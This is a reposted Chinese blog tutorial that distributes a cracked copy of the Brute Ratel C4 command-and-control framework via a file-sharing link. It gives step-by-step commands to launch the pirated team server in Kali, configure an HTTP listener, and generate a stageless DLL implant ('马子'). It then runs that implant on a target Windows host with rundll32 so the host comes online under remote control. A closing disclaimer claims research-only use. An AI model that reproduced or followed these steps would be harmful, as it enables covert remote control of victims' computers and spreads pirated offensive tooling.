1 前言
2 简单使用教程
以下操作除马子执行外,均在kali完成。
拿到压缩包,放到kali中解压,得到如下文件:
给brute-ratel-linx64_crack以及lib64/commander执行权限
chmod +x brute-ratel-linx64_crackchmod +x lib64/commander
然后启动服务端:
./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem
其中,账号密码端口等都可以自行修改
之后打开客户端,在kali图形界面中找到brc4文件夹,执行命令:
chmod +x Rungui.sh./Rungui.sh
输入你自定义的账号密码端口,点击猴子头像连接即可
接下来是生成马子并上线,本文只演示一种简单的配置,复杂的配置请自行研究
进入客户端后,点击C4 Profiler -> Add http Listener
按如下图示配置即可
需要注意的地方:listener name为监听名称,可自定义,第二行为选择监听地址,可点击选择你的ip,第三行为重定向地址,可点击右侧same按钮选择与监听地址一致,端口可自定义,URL栏据官方描述可随便乱填,ssl棉花糖个人建议选择no,因为测试中ssl选择yes无法成功上线,sleep和jitter类似于cs的延时时间,可调低,末尾最后一行勾选后,马子如果一次不上线,不会一直请求
配置好后点击save保存,等待几秒钟即可得到一个监听器,右键此监听器,选择Stageless,即可生成对应架构的马子,棉花糖演示选择的是 X64 Arch (Default) -> Dll,生成的dll放到目标win中,cmd执行:
rundll32 .badger_x64.dll,main
即可上线
3 下载链接
https://pan.quark.cn/s/e2292b4916cd
原文始发于微信公众号(棉花糖网络安全圈):远控工具BRC4 1.4.5破解版——附简单使用教程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论